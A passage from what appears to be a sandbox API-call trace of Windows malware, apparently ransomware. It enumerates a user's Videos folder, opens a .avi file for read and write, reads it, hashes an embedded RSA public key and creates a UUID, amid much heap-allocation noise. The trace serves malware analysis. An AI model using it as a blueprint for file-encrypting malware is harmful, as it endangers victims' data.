Size=0x40) returned 0x2d2d238 [0197.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.366] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0197.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d238 | out: hHeap=0x6a0000) returned 1 [0197.367] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.367] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.367] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.367] PathFindFileNameW (pszPath="") returned="" [0197.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.367] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\c9qz99w\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c3a7950, ftCreationTime.dwHighDateTime=0x1d899ee, ftLastAccessTime.dwLowDateTime=0x22ba94e0, ftLastAccessTime.dwHighDateTime=0x1d89d4f, ftLastWriteTime.dwLowDateTime=0x22ba94e0, ftLastWriteTime.dwHighDateTime=0x1d89d4f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0197.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.370] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c3a7950, ftCreationTime.dwHighDateTime=0x1d899ee, ftLastAccessTime.dwLowDateTime=0x22ba94e0, ftLastAccessTime.dwHighDateTime=0x1d89d4f, ftLastWriteTime.dwLowDateTime=0x22ba94e0, ftLastWriteTime.dwHighDateTime=0x1d89d4f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.370] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf83dfd0, ftCreationTime.dwHighDateTime=0x1d8a15f, ftLastAccessTime.dwLowDateTime=0x2895e590, ftLastAccessTime.dwHighDateTime=0x1d8a2cc, ftLastWriteTime.dwLowDateTime=0x2895e590, ftLastWriteTime.dwHighDateTime=0x1d8a2cc, nFileSizeHigh=0x0, nFileSizeLow=0x1274a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="82ajW1E0_3n2yYSE_.avi", cAlternateFileName="82AJW1~1.AVI")) returned 1 [0197.370] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\82ajW1E0_3n2yYSE_.avi") returned=".avi" [0197.370] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\82ajW1E0_3n2yYSE_.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\c9qz99w\\82ajw1e0_3n2yyse_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.370] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=75594) returned 1 [0197.370] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.377] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x12724, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.377] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.379] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.380] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1274a, lpOverlapped=0x0) returned 1 [0197.381] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.381] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.381] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.381] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.382] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.382] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.382] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.382] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.382] GetLastError () returned 0x0 [0197.382] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.382] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.383] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.383] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.383] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12750) returned 0x2d4f778 [0197.385] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d238 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d280 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.387] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3f0 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a3d8 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0197.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.390] GetCurrentThreadId () returned 0x264 [0197.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4bb80 [0197.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.391] GetCurrentThreadId () returned 0x264 [0197.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3f0 [0197.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a450 [0197.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0197.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a468 [0197.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a408 [0197.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0197.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3d8 [0197.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d280 | out: hHeap=0x6a0000) returned 1 [0197.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | 